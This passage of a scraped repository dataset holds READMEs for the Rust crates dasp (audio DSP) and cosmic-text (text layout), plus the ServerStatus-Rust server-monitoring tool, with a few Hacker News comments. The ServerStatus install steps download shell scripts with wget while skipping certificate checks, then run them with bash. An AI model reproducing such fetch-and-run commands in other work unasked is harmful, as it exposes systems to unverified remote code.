|\n| [**`dasp_signal`**][dasp_signal] | [![Crates.io][dasp_signal-crates-io-svg]][dasp_signal-crates-io] [![docs.rs][dasp_signal-docs-rs-svg]][dasp_signal-docs-rs] | Iterator-like API for streams of audio frames. |\n| [**`dasp_graph`**][dasp_graph] | [![Crates.io][dasp_graph-crates-io-svg]][dasp_graph-crates-io] [![docs.rs][dasp_graph-docs-rs-svg]][dasp_graph-docs-rs] | For working with modular, dynamic audio graphs. |\n\n[![deps-graph][deps-graph]][deps-graph]\n\n*Red dotted lines indicate optional dependencies, while black lines indicate\nrequired dependencies.*\n\n\n## Features\n\nUse the **Sample** trait to convert between and remain generic over any\nbit-depth in an optimal, performance-sensitive manner. Implementations are\nprovided for all signed integer, unsigned integer and floating point primitive\ntypes along with some custom types including 11, 20, 24 and 48-bit signed and\nunsigned unpacked integers. For example:\n\n```rust\nassert_eq!((-1.0).to_sample::(), 0);\nassert_eq!(0.0.to_sample::(), 128);\nassert_eq!(0i32.to_sample::(), 2_147_483_648);\nassert_eq!(I24::new(0).unwrap(), Sample::from_sample(0.0));\nassert_eq!(0.0, Sample::EQUILIBRIUM);\n```\n\nUse the **Frame** trait to remain generic over the number of channels at a\ndiscrete moment in time. 
Implementations are provided for all fixed-size arrays\nup to 32 elements in length.\n\n```rust\nlet foo = [0.1, 0.2, -0.1, -0.2];\nlet bar = foo.scale_amp(2.0);\nassert_eq!(bar, [0.2, 0.4, -0.2, -0.4]);\n\nassert_eq!(Mono::::EQUILIBRIUM, [0.0]);\nassert_eq!(Stereo::::EQUILIBRIUM, [0.0, 0.0]);\nassert_eq!(<[f32; 3]>::EQUILIBRIUM, [0.0, 0.0, 0.0]);\n\nlet foo = [0i16, 0];\nlet bar: [u8; 2] = foo.map(Sample::to_sample);\nassert_eq!(bar, [128u8, 128]);\n```\n\nUse the **Signal** trait (enabled by the \"signal\" feature) for working with\ninfinite-iterator-like types that yield `Frame`s. **Signal** provides methods\nfor adding, scaling, offsetting, multiplying, clipping, generating, monitoring\nand buffering streams of `Frame`s. Working with **Signal**s allows for easy,\nreadable creation of rich and complex DSP graphs with a simple and familiar API.\n\n```rust\n// Clip to an amplitude of 0.9.\nlet frames = [[1.2, 0.8], [-0.7, -1.4]];\nlet clipped: Vec<_> = signal::from_iter(frames.iter().cloned()).clip_amp(0.9).take(2).collect();\nassert_eq!(clipped, vec![[0.9, 0.8], [-0.7, -0.9]]);\n\n// Add `a` with `b` and yield the result.\nlet a = [0.2, -0.6, 0.5];\nlet b = [0.2, 0.1, -0.8];\nlet a_signal = signal::from_iter(a.iter().cloned());\nlet b_signal = signal::from_iter(b.iter().cloned());\nlet added: Vec = a_signal.add_amp(b_signal).take(3).collect();\nassert_eq!(added, vec![0.4, -0.5, -0.3]);\n\n// Scale the playback rate by `0.5`.\nlet foo = [0.0, 1.0, 0.0, -1.0];\nlet mut source = signal::from_iter(foo.iter().cloned());\nlet a = source.next();\nlet b = source.next();\nlet interp = Linear::new(a, b);\nlet frames: Vec<_> = source.scale_hz(interp, 0.5).take(8).collect();\nassert_eq!(&frames[..], &[0.0, 0.5, 1.0, 0.5, 0.0, -0.5, -1.0, -0.5][..]);\n\n// Convert a signal to its RMS.\nlet signal = signal::rate(44_100.0).const_hz(440.0).sine();;\nlet ring_buffer = ring_buffer::Fixed::from([0.0; WINDOW_SIZE]);\nlet mut rms_signal = signal.rms(ring_buffer);\n```\n\nThe **signal** module also provides a series of **Signal** source types,\nincluding:\n\n- `FromIterator`\n- `FromInterleavedSamplesIterator`\n- `Equilibrium` (silent signal)\n- `Phase`\n- `Sine`\n- `Saw`\n- `Square`\n- `Noise`\n- `NoiseSimplex`\n- `Gen` (generate frames from a Fn() -> F)\n- `GenMut` (generate frames from a FnMut() -> F)\n\nUse the **slice** module functions (enabled via the \"slice\" feature) for\nprocessing chunks of `Frame`s. Conversion functions are provided for safely\nconverting between slices of interleaved `Sample`s and slices of `Frame`s\nwithout requiring any allocation. For example:\n\n```rust\nlet frames = &[[0.0, 0.5], [0.0, -0.5]][..];\nlet samples = slice::to_sample_slice(frames);\nassert_eq!(samples, &[0.0, 0.5, 0.0, -0.5][..]);\n\nlet samples = &[0.0, 0.5, 0.0, -0.5][..];\nlet frames = slice::to_frame_slice(samples);\nassert_eq!(frames, Some(&[[0.0, 0.5], [0.0, -0.5]][..]));\n\nlet samples = &[0.0, 0.5, 0.0][..];\nlet frames = slice::to_frame_slice(samples);\nassert_eq!(frames, None::<&[[f32; 2]]>);\n```\n\nThe **signal::interpolate** module provides a **Converter** type, for converting\nand interpolating the rate of **Signal**s. This can be useful for both sample\nrate conversion and playback rate multiplication. 
**Converter**s can use a range\nof interpolation methods, with Floor, Linear, and Sinc interpolation provided in\nthe library.\n\nThe **ring_buffer** module provides generic **Fixed** and **Bounded** ring\nbuffer types, both of which may be used with owned, borrowed, stack and\nallocated buffers.\n\nThe **peak** module can be used for monitoring the peak of a signal. Provided\npeak rectifiers include `full_wave`, `positive_half_wave` and\n`negative_half_wave`.\n\nThe **rms** module provides a flexible **Rms** type that can be used for RMS\n(root mean square) detection. Any **Fixed** ring buffer can be used as the\nwindow for the RMS detection.\n\nThe **envelope** module provides a **Detector** type (also known as a\n*Follower*) that allows for detecting the envelope of a signal. **Detector** is\ngeneric over the type of **Detect**ion - **Rms** and **Peak** detection are\nprovided. For example:\n\n```rust\nlet signal = signal::rate(4.0).const_hz(1.0).sine();\nlet attack = 1.0;\nlet release = 1.0;\nlet detector = envelope::Detector::peak(attack, release);\nlet mut envelope = signal.detect_envelope(detector);\nassert_eq!(\n envelope.take(4).collect::>(),\n vec![0.0, 0.6321205496788025, 0.23254416035257117, 0.7176687675647109]\n);\n```\n\n\n## `no_std`\n\nAll crates may be compiled with and without the std library. The std library is\nenabled by default, however it may be disabled via `--no-default-features`.\n\nTo enable all of a crate's features *without* the std library, you may use\n`--no-default-features --features \"all-no-std\"`.\n\nPlease note that some of the crates require the `core_intrinsics` feature in\norder to be able to perform operations like `sin`, `cos` and `powf32` in a\n`no_std` context. This means that these crates require the nightly toolchain in\norder to build in a `no_std` context.\n\n\n## Contributing\n\nIf **dasp** is missing types, conversions or other fundamental functionality\nthat you wish it had, feel free to open an issue or pull request! 
The more\nhands on deck, the merrier :)\n\n\n## License\n\nLicensed under either of\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n**Contributions**\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n\n\n[dasp-actions]: https://github.com/rustaudio/dasp/actions\n[dasp-actions-svg]: https://github.com/rustaudio/dasp/workflows/dasp/badge.svg\n[deps-graph]: ./assets/deps-graph.png\n[dasp]: ./dasp\n[dasp-crates-io]: https://crates.io/crates/dasp\n[dasp-crates-io-svg]: https://img.shields.io/crates/v/dasp.svg\n[dasp-docs-rs]: https://docs.rs/dasp/\n[dasp-docs-rs-svg]: https://docs.rs/dasp/badge.svg\n[dasp_envelope]: ./dasp_envelope\n[dasp_envelope-crates-io]: https://crates.io/crates/dasp_envelope\n[dasp_envelope-crates-io-svg]: https://img.shields.io/crates/v/dasp_envelope.svg\n[dasp_envelope-docs-rs]: https://docs.rs/dasp_envelope/\n[dasp_envelope-docs-rs-svg]: https://docs.rs/dasp_envelope/badge.svg\n[dasp_frame]: ./dasp_frame\n[dasp_frame-crates-io]: https://crates.io/crates/dasp_frame\n[dasp_frame-crates-io-svg]: https://img.shields.io/crates/v/dasp_frame.svg\n[dasp_frame-docs-rs]: https://docs.rs/dasp_frame/\n[dasp_frame-docs-rs-svg]: https://docs.rs/dasp_frame/badge.svg\n[dasp_graph]: ./dasp_graph\n[dasp_graph-crates-io]: https://crates.io/crates/dasp_graph\n[dasp_graph-crates-io-svg]: https://img.shields.io/crates/v/dasp_graph.svg\n[dasp_graph-docs-rs]: https://docs.rs/dasp_graph/\n[dasp_graph-docs-rs-svg]: https://docs.rs/dasp_graph/badge.svg\n[dasp_interpolate]: ./dasp_interpolate\n[dasp_interpolate-crates-io]: https://crates.io/crates/dasp_interpolate\n[dasp_interpolate-crates-io-svg]: https://img.shields.io/crates/v/dasp_interpolate.svg\n[dasp_interpolate-docs-rs]: https://docs.rs/dasp_interpolate/\n[dasp_interpolate-docs-rs-svg]: https://docs.rs/dasp_interpolate/badge.svg\n[dasp_peak]: ./dasp_peak\n[dasp_peak-crates-io]: https://crates.io/crates/dasp_peak\n[dasp_peak-crates-io-svg]: https://img.shields.io/crates/v/dasp_peak.svg\n[dasp_peak-docs-rs]: https://docs.rs/dasp_peak/\n[dasp_peak-docs-rs-svg]: https://docs.rs/dasp_peak/badge.svg\n[dasp_ring_buffer]: ./dasp_ring_buffer\n[dasp_ring_buffer-crates-io]: https://crates.io/crates/dasp_ring_buffer\n[dasp_ring_buffer-crates-io-svg]: https://img.shields.io/crates/v/dasp_ring_buffer.svg\n[dasp_ring_buffer-docs-rs]: https://docs.rs/dasp_ring_buffer/\n[dasp_ring_buffer-docs-rs-svg]: https://docs.rs/dasp_ring_buffer/badge.svg\n[dasp_rms]: ./dasp_rms\n[dasp_rms-crates-io]: https://crates.io/crates/dasp_rms\n[dasp_rms-crates-io-svg]: https://img.shields.io/crates/v/dasp_rms.svg\n[dasp_rms-docs-rs]: https://docs.rs/dasp_rms/\n[dasp_rms-docs-rs-svg]: https://docs.rs/dasp_rms/badge.svg\n[dasp_sample]: ./dasp_sample\n[dasp_sample-crates-io]: https://crates.io/crates/dasp_sample\n[dasp_sample-crates-io-svg]: https://img.shields.io/crates/v/dasp_sample.svg\n[dasp_sample-docs-rs]: https://docs.rs/dasp_sample/\n[dasp_sample-docs-rs-svg]: https://docs.rs/dasp_sample/badge.svg\n[dasp_signal]: ./dasp_signal\n[dasp_signal-crates-io]: https://crates.io/crates/dasp_signal\n[dasp_signal-crates-io-svg]: https://img.shields.io/crates/v/dasp_signal.svg\n[dasp_signal-docs-rs]: 
https://docs.rs/dasp_signal/\n[dasp_signal-docs-rs-svg]: https://docs.rs/dasp_signal/badge.svg\n[dasp_slice]: ./dasp_slice\n[dasp_slice-crates-io]: https://crates.io/crates/dasp_slice\n[dasp_slice-crates-io-svg]: https://img.shields.io/crates/v/dasp_slice.svg\n[dasp_slice-docs-rs]: https://docs.rs/dasp_slice/\n[dasp_slice-docs-rs-svg]: https://docs.rs/dasp_slice/badge.svg\n[dasp_window]: ./dasp_window\n[dasp_window-crates-io]: https://crates.io/crates/dasp_window\n[dasp_window-crates-io-svg]: https://img.shields.io/crates/v/dasp_window.svg\n[dasp_window-docs-rs]: https://docs.rs/dasp_window/\n[dasp_window-docs-rs-svg]: https://docs.rs/dasp_window/badge.svg\n", "readme_type": "markdown", "hn_comments": "All codes are gone :(Thanks a lot for your response. It's beacuse of all of you that the post made it to the first page of hackernews. This kind of appreciation means so much :)Please find some more promo codes for the app below:7JEF3YKF4M6M\nHTEMPJYPA63M\n4T7RF9KJ9FJ4\n3TYWKK4A363H\nJ7KA7AYHJ7ER\nEYLA6NJX4FHJ\nWTNARFLK7LY4\n4WT9M6TA43KN\nWMTNT6LN63PJ\nMHWEHXXNLLNKThe codes have all been usedLooks pretty neat, and maybe a simple utility app that looks neat is just the way to go on the App Store.One thing that caught my eye though was: why are the launch images not filled with the numbers? On a similar note, though--I don't have an idea how to solve that while still using lauch images--the launch image is white, changing themes, killing the app and restarting it hence results in a visible flickr.That said, I did sometimes have trouble hitting the keys, due to the inactive space in between.What are the promo codes for?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pop-os/cosmic-text", "link": "https://github.com/pop-os/cosmic-text", "tags": [], "stars": 658, "description": "Pure Rust multi-line text handling", "lang": "Rust", "repo_lang": "", "readme": "# COSMIC Text\n\n[![crates.io](https://img.shields.io/crates/v/cosmic-text.svg)](https://crates.io/crates/cosmic-text)\n[![docs.rs](https://docs.rs/cosmic-text/badge.svg)](https://docs.rs/cosmic-text)\n![license](https://img.shields.io/crates/l/cosmic-text.svg)\n[![Rust workflow](https://github.com/pop-os/cosmic-text/workflows/Rust/badge.svg?event=push)](https://github.com/pop-os/cosmic-text/actions)\n\nPure Rust multi-line text handling.\n\nCOSMIC Text provides advanced text shaping, layout, and rendering wrapped up\ninto a simple abstraction. Shaping is provided by rustybuzz, and supports a\nwide variety of advanced shaping operations. Rendering is provided by swash,\nwhich supports ligatures and color emoji. Layout is implemented custom, in safe\nRust, and supports bidirectional text. Font fallback is also a custom\nimplementation, reusing some of the static fallback lists in browsers such as\nChromium and Firefox. Linux, macOS, and Windows are supported with the full\nfeature set. 
Other platforms may need to implement font fallback capabilities.\n\n## Screenshots\n\nArabic translation of Universal Declaration of Human Rights\n[![Arabic screenshot](screenshots/arabic.png)](screenshots/arabic.png)\n\nHindi translation of Universal Declaration of Human Rights\n[![Hindi screenshot](screenshots/hindi.png)](screenshots/hindi.png)\n\nSimplified Chinese translation of Universal Declaration of Human Rights\n[![Simplified Chinses screenshot](screenshots/chinese-simplified.png)](screenshots/chinese-simplified.png)\n\n## Roadmap\n\nThe following features must be supported before this is \"ready\":\n\n- [x] Font loading (using fontdb)\n - [x] Preset fonts\n - [x] System fonts\n- [x] Text styles (bold, italic, etc.)\n - [x] Per-buffer\n - [x] Per-span\n- [x] Font shaping (using rustybuzz)\n - [x] Cache results\n - [x] RTL\n - [x] Bidirectional rendering\n- [x] Font fallback\n - [x] Choose font based on locale to work around \"unification\"\n - [x] Per-line granularity\n - [x] Per-character granularity\n- [x] Font layout\n - [x] Click detection\n - [x] Simple wrapping\n - [ ] Wrapping with indentation\n - [ ] No wrapping\n - [ ] Ellipsize\n- [x] Font rendering (using swash)\n - [x] Cache results\n - [x] Font hinting\n - [x] Ligatures\n - [x] Color emoji\n- [x] Text editing\n - [x] Performance improvements\n - [x] Text selection\n - [x] Can automatically recreate https://unicode.org/udhr/ without errors (see below)\n - [x] Bidirectional selection\n - [ ] Copy/paste\n- [x] no_std support (with `default-features = false`)\n - [ ] no_std font loading\n - [x] no_std shaping\n - [x] no_std layout\n - [ ] no_std rendering\n\nThe UDHR (Universal Declaration of Human Rights) test involves taking the entire\nset of UDHR translations (almost 500 languages), concatenating them as one file\n(which ends up being 8 megabytes!), then via the `editor-test` example,\nautomatically simulating the entry of that file into cosmic-text per-character,\nwith the use of backspace and delete tested per character and per line. Then,\nthe final contents of the buffer is compared to the original file. All of the\n106746 lines are correct.\n\n## License\n\nLicensed under either of\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or\n http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or\n http://opensource.org/licenses/MIT)\n\nat your option.\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "This sounds interesting, but the feature set isn't clear to me.Is this perhaps related to COSMIC initiative? See https://news.ycombinator.com/item?id=33259750", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zdz/ServerStatus-Rust", "link": "https://github.com/zdz/ServerStatus-Rust", "tags": ["rust", "serverstatus", "serverstatus-rust", "railway", "vnstat", "telegram", "wechat", "webhook", "probe"], "stars": 658, "description": "\u2728 Rust \u7248 ServerStatus \u63a2\u9488\u3001\u5a01\u529b\u52a0\u5f3a\u7248", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\u2728 ServerStatus cloud probe, Rust edition

\n \n

\n\n
\n

\n \n \"Docker\"\n \n \n \"Release\"\n \n \"GitHub\n \n \n \"GitHub\n \n \n \"GitHub\n \n \n \"GitHub\n \n

\n
\n\n\"image\"\n\"image\"\n\n\n\n

Table of Contents

\n\n- [\u2728 ServerStatus cloud probe, Rust edition](#-rust-\u7248-serverstatus-\u4e91\u63a2\u9488)\n - [1. Introduction](#1-\u4ecb\u7ecd)\n - [\ud83c\udf40 Themes](#-\u4e3b\u9898)\n - [2. Installation and deployment](#2-\u5b89\u88c5\u90e8\u7f72)\n - [2.1 Quick trial](#21-\u5feb\u901f\u4f53\u9a8c)\n - [2.2 Quick deployment](#22-\u5feb\u901f\u90e8\u7f72)\n - [2.3 Deployment via the service management script, thanks to @Colsro](#23-\u670d\u52a1\u7ba1\u7406\u811a\u672c\u90e8\u7f72\u611f\u8c22-colsro-\u63d0\u4f9b)\n - [2.4 Railway deployment](#24-railway-\u90e8\u7f72)\n - [3. Server notes](#3-\u670d\u52a1\u7aef\u8bf4\u660e)\n - [3.1 Configuration file `config.toml`](#31-\u914d\u7f6e\u6587\u4ef6-configtoml)\n - [3.2 Running the server](#32-\u670d\u52a1\u7aef\u8fd0\u884c)\n - [4. Client notes](#4-\u5ba2\u6237\u7aef\u8bf4\u660e)\n - [4.1 Linux (`CentOS`, `Ubuntu`, `Debian`)](#41-linux-centos-ubuntu-debian)\n - [4.2 Cross-platform builds (`Windows`, `Linux`, `...`)](#42-\u8de8\u5e73\u53f0\u7248\u672c-window-linux-)\n - [5. Enabling `vnstat` support](#5-\u5f00\u542f-vnstat-\u652f\u6301)\n - [6. FAQ](#6-faq)\n - [7. Related projects](#7-\u76f8\u5173\u9879\u76ee)\n - [8. Closing words](#8-\u6700\u540e)\n\n## 1. Introduction\n A beefed-up `ServerStatus` that stays lightweight and simple to deploy, adding the following major features:\n\n- `server` and `client` completely rewritten in `rust`, deployed as a single executable\n- multi-OS support: `Linux`, `MacOS`, `Windows`, `Android`, `Raspberry Pi`\n- up/down alerts and simple custom-rule alerts (`telegram`, `wechat`, `email`, `webhook`)\n- reporting over the `http` protocol, which makes it easy to deploy on free container services and to optimize the reporting path with `cf` and the like\n- monthly traffic accounting via `vnstat`, so traffic data survives restarts\n- quick deployment on `railway`\n- autostart at boot via `systemd`\n- other features, e.g. the \ud83d\uddfa\ufe0f map, see the [wiki](https://github.com/zdz/ServerStatus-Rust/wiki)\n\nDemo: [ssr.rs](https://ssr.rs) | [cn dns](https://ck.ssr.rs)\n|\nDownload: [Releases](https://github.com/zdz/ServerStatus-Rust/releases)\n|\n[Changelog](https://github.com/zdz/ServerStatus-Rust/releases)\n|\nFeedback: [Discussions](https://github.com/zdz/ServerStatus-Rust/discussions)\n\n\ud83d\udcd5 The full documentation has moved to [doc.ssr.rs](https://doc.ssr.rs)\n\n| OS | Release |\n| ---- | ---- |\n| Linux x86_64 | x86_64-unknown-linux-musl |\n| Linux arm64 | aarch64-unknown-linux-musl |\n| MacOS x86_64 | x86_64-apple-darwin |\n| MacOS arm64 | aarch64-apple-darwin |\n| Windows x86_64 | x86_64-pc-windows-msvc |\n| Raspberry Pi | armv7-unknown-linux-musleabihf |\n| Android 64bit | aarch64-linux-android |\n| Android 32bit | armv7-linux-androideabi |\n\n### \ud83c\udf40 Themes\n\nIf you think a theme you have created or modified turned out well, feel free to share it or open a PR; see [#37](https://github.com/zdz/ServerStatus-Rust/discussions/37) for deploying the frontend on its own\n\n
\n Hotaru theme\n\nThe Hotaru theme was adapted and contributed by [@HinataKato](https://github.com/HinataKato); [theme repository](https://github.com/HinataKato/hotaru_theme_for_RustVersion)\n\n\"image\"\n\n
\n\n
\n ServerStatus-web theme\n\nThe ServerStatus-web theme was adapted and contributed by [@mjjrock](https://github.com/mjjrock); [theme repository](https://github.com/mjjrock/ServerStatus-web)\n\n\"image\"\n\n
\n\n\n
\n Theme of release v1.5.7\n\n[Demo](https://tz-rust.vercel.app)\n\n\"image\"\n
\n\n## 2. Installation and deployment\n\n### 2.1 Quick trial\n```bash\n# for CentOS/Debian/Ubuntu x86_64\nmkdir -p /opt/ServerStatus && cd /opt/ServerStatus\n# apt install -y unzip / yum install -y unzip\nwget --no-check-certificate -qO one-touch.sh 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/one-touch.sh'\nbash -ex one-touch.sh\n# deployment done; open http://127.0.0.1:8080/ or http://<your IP>:8080/\n# for a custom deployment, use the one-touch.sh script as a reference\n```\n\n### 2.2 Quick deployment\n\n\ud83d\udc49 [Quick deployment](https://doc.ssr.rs/rapid_deploy)\n\n### 2.3 Deployment via the service management script, thanks to [@Colsro](https://github.com/Colsro)\n
\n Management script usage\n\n```bash\n# download the script\nwget --no-check-certificate -qO status.sh 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/status.sh'\n\n# install the server\nbash status.sh -i -s\n\n# install the client\nbash status.sh -i -c\n# or\nbash status.sh -i -c protocol://username:password@master:port\n# eg:\nbash status.sh -i -c grpc://h1:p1@127.0.0.1:9394\nbash status.sh -i -c http://h1:p1@127.0.0.1:8080\n\n# more usage:\n\u276f bash status.sh\n\nhelp:\n -i,--install install Status\n -i -s install the Server\n -i -c install the Client\n -i -c conf install the Client non-interactively\n -u,--uninstall uninstall Status\n -u -s uninstall the Server\n -u -c uninstall the Client\n -r,--reset change the Status config\n -r change the Client config\n -r conf change the Client config non-interactively\n -s,--server manage the Status service state\n -s {start|stop|restart}\n -c,--client manage the Client service state\n -c {start|stop|restart}\n\nif GitHub is unreachable:\n CN=true bash status.sh args\n# might help a little\n```\n
\n\n\n### 2.4 Railway deployment\n\nToo lazy to configure `Nginx` and an `SSL` certificate? Try\n[deploying the Server on Railway](https://github.com/zdz/ServerStatus-Rust/wiki/Railway)\n\n[![Deploy on Railway](https://railway.app/button.svg)](https://railway.app/new/template/kzT46l?referralCode=pJYbdU)\n\n\n## 3. Server notes\n\n### 3.1 Configuration file `config.toml`\n```toml\n# listen addresses; for ipv6 use [::]:9394\ngrpc_addr = \"0.0.0.0:9394\"\nhttp_addr = \"0.0.0.0:8080\"\n# by default a host is judged offline after 30s without reports\noffline_threshold = 30\n\n# admin account, used to view /detail and /map; randomly generated if left unset\nadmin_user = \"\"\nadmin_pass = \"\"\n\n# hosts and hosts_group are two configuration modes; pick whichever one you like\n# name is the unique host id and must not repeat; alias is the display name\n# notify = false disables alerts for just this machine, typically for hosts with poor connectivity that flap on/offline\n# monthstart = 1: when vnstat is not enabled, the day of the month on which traffic accounting starts\n# disabled = true disables a single host\n# location supports flag emoji https://emojixd.com/group/flags\n# or country codes such as cn, us and so on; see the web/static/flags directory for all countries\n# custom labels, e.g. labels = \"os=centos;ndd=2022/11/25;spec=2C/4G/60G;\"\n# the os label is optional and falls back to the reported data; ndd (next due date) is the next renewal date, spec is the host spec\n# valid os values: centos debian ubuntu alpine pi arch windows linux\nhosts = [\n {name = \"h1\", password = \"p1\", alias = \"n1\", location = \"\ud83c\udfe0\", type = \"kvm\", labels = \"os=arch;ndd=2022/11/25;spec=2C/4G/60G;\"},\n {name = \"h2\", password = \"p2\", alias = \"n2\", location = \"\ud83c\udfe2\", type = \"kvm\", disabled = false},\n {name = \"h3\", password = \"p3\", alias = \"n3\", location = \"\ud83c\udfe1\", type = \"kvm\", monthstart = 1},\n {name = \"h4\", password = \"p4\", alias = \"n4\", location = \"cn\", type = \"kvm\", notify = true, labels = \"ndd=2022/11/25;spec=2C/4G/60G;\"},\n]\n\n# dynamic registration mode: no more per-host configuration needed\n# gid is the template group id, the unique key for dynamic registration; must not repeat\nhosts_group = [\n # groups can be organized by country/region or by purpose\n {gid = \"g1\", password = \"pp\", location = \"\ud83c\udfe0\", type = \"kvm\", notify = true},\n {gid = \"g2\", password = \"pp\", location = \"\ud83c\udfe2\", type = \"kvm\", notify = true},\n # for example, hosts that should not send notifications can get a group of their own\n {gid = \"silent\", password = \"pp\", location = \"\ud83c\udfe1\", type = \"kvm\", notify = false},\n]\n# in dynamic registration mode, the interval for cleaning up stale data; default 30s\ngroup_gc = 30\n\n# if you do not enable alerting you can ignore the rest of the config, or delete the notification channels you do not need\n# 
the alert interval defaults to 30s\nnotify_interval = 30\n# https://core.telegram.org/bots/api\n# https://jinja.palletsprojects.com/en/3.0.x/templates/#if\n[tgbot]\n# switch: set true to enable\nenabled = false\nbot_token = \"\"\nchat_id = \"\"\n# for the fields available on host, see the HostStat struct in payload.rs; {{host.xxx}} are placeholders\n# e.g. host.name can be replaced with host.alias; write the notification text however you like\n# {{ip_info.query}} is the host ip, {{sys_info.host_name}} is the host's hostname\ntitle = \"\u2757Server Status\"\nonline_tpl = \"{{config.title}} \\n\ud83d\ude06 {{host.location}} {{host.name}} host is back online\"\noffline_tpl = \"{{config.title}} \\n\ud83d\ude31 {{host.location}} {{host.name}} host has gone offline\"\n# leave the custom template empty to disable custom alerts and keep only the online/offline notifications\ncustom_tpl = \"\"\"\n{% if host.memory_used / host.memory_total > 0.5 %}\n
\ud83d\ude32 {{host.name}} host memory usage is above 50%, currently {{ (100 * host.memory_used / host.memory_total) | round }}% 
\n{% endif %}\n\n{% if host.hdd_used / host.hdd_total > 0.5 %}\n
\ud83d\ude32 {{host.name}} host disk usage is above 50%, currently {{ (100 * host.hdd_used / host.hdd_total) | round }}% 
\n{% endif %}\n\"\"\"\n\n# wechat, email, webhook \u7b49\u5176\u5b83\u901a\u77e5\u65b9\u5f0f \u914d\u7f6e\u8be6\u7ec6\u89c1 config.toml\n```\n\n### 3.2 \u670d\u52a1\u7aef\u8fd0\u884c\n```bash\n# systemd \u65b9\u5f0f\uff0c \u53c2\u7167 one-touch.sh \u811a\u672c (\u63a8\u8350)\n\n# \ud83d\udcaa \u624b\u52a8\u65b9\u5f0f\n# help\n./stat_server -h\n# \u624b\u52a8\u8fd0\u884c\n./stat_server -c config.toml\n# \u6216\nRUST_BACKTRACE=1 RUST_LOG=trace ./stat_server -c config.toml\n\n# \u6d4b\u8bd5\u914d\u7f6e\u6587\u4ef6\u662f\u5426\u6709\u6548\n./stat_server -c config.toml -t\n# \u6839\u636e\u914d\u7f6e\u53d1\u9001\u6d4b\u8bd5\u6d88\u606f\uff0c\u9a8c\u8bc1\u901a\u77e5\u662f\u5426\u751f\u6548\n./stat_server -c config.toml --notify-test\n\n# \ud83d\udc33 docker \u65b9\u5f0f\nwget --no-check-certificate -qO docker-compose.yml 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/docker-compose.yml'\nwget --no-check-certificate -qO config.toml 'https://raw.githubusercontent.com/zdz/ServerStatus-Rust/master/config.toml'\ntouch stats.json\ndocker-compose up -d\n```\n\n## 4. \u5ba2\u6237\u7aef\u8bf4\u660e\n\n### 4.1 Linux (`CentOS`, `Ubuntu`, `Debian`)\n```bash\n# \u516c\u7f51\u73af\u5883\u5efa\u8bae headscale/nebula \u7ec4\u7f51\u6216\u8d70 https, \u4f7f\u7528 nginx \u5bf9 server \u5957 ssl \u548c\u81ea\u5b9a\u4e49 location /report\n# Rust \u7248\u53ea\u5728 CentOS, Ubuntu, Debian \u6d4b\u8bd5\u8fc7\n# alpine linux \u9700\u8981\u5b89\u88c5\u76f8\u5173\u547d\u4ee4 apk add procps iproute2 coreutils\n# \u5982\u679c Rust \u7248\u5ba2\u6237\u7aef\u5728\u4f60\u7684\u7cfb\u7edf\u65e0\u6cd5\u4f7f\u7528\uff0c\u8bf7\u5207\u6362\u5230\u4e0b\u9762 4.2 \u8de8\u5e73\u53f0\u7248\u672c\n\n# systemd \u65b9\u5f0f\uff0c \u53c2\u7167 one-touch.sh \u811a\u672c (\u63a8\u8350)\n\n# \ud83d\udcaa \u624b\u52a8\u65b9\u5f0f\n# Rust \u7248\u672c Client\n./stat_client -h\n./stat_client -a \"http://127.0.0.1:8080/report\" -u h1 -p p1\n# \u6216\n./stat_client -a \"grpc://127.0.0.1:9394\" -u h1 -p p1\n\n# rust client \u53ef\u7528\u53c2\u6570\n./stat_client -h\nOPTIONS:\n -6, --ipv6 ipv6 only, default:false\n -a, --addr [default: http://127.0.0.1:8080/report]\n --alias alias for host [default: unknown]\n --cm China Mobile probe addr [default: cm.tz.cloudcpp.com:80]\n --ct China Telecom probe addr [default: ct.tz.cloudcpp.com:80]\n --cu China Unicom probe addr [default: cu.tz.cloudcpp.com:80]\n --disable-extra disable extra info report, default:false\n --disable-notify disable notify, default:false\n --disable-ping disable ping, default:false\n --disable-tupd disable t/u/p/d, default:false\n -g, --gid group id [default: ]\n -h, --help Print help information\n --ip-info show ip info, default:false\n --sys-info show sys info, default:false\n --json use json protocol, default:false\n --location location [default: ]\n -n, --vnstat enable vnstat, default:false\n --vnstat-mr vnstat month rotate 1-28 [default: 1]\n -p, --pass password [default: p1]\n -t, --type host type [default: ]\n -u, --user username [default: h1]\n -V, --version Print version information\n -w, --weight weight for rank [default: 0]\n\n# \u4e00\u4e9b\u53c2\u6570\u8bf4\u660e\n--ip-info # \u663e\u793a\u672c\u673aip\u4fe1\u606f\u540e\u7acb\u5373\u9000\u51fa\uff0c\u76ee\u524d\u4f7f\u7528 ip-api.com \u6570\u636e\n--sys-info # \u663e\u793a\u672c\u673a\u7cfb\u7edf\u4fe1\u606f\u540e\u7acb\u5373\u9000\u51fa\n--disable-extra # \u4e0d\u4e0a\u62a5\u7cfb\u7edf\u4fe1\u606f\u548cIP\u4fe1\u606f\n--disable-ping # 
disable the three-carrier latency and packet-loss probes\n--disable-tupd # do not report tcp/udp/process/thread counts, reducing CPU usage\n-w, --weight # rank bonus, to nudge a host up the list; ignore if you do not care\n-g, --gid # group id for dynamic registration\n--alias # in dynamic registration mode, the display name for this host\n# total traffic and per-NIC traffic/speed accounting\n-i, --iface # when non-empty, only account the listed interfaces\n-e, --exclude-iface # exclude the listed interfaces, default \"lo,docker,vnet,veth,vmbr,kube,br-\"\n```\n\n### 4.2 Cross-platform builds (`Windows`, `Linux`, `...`)\n\n
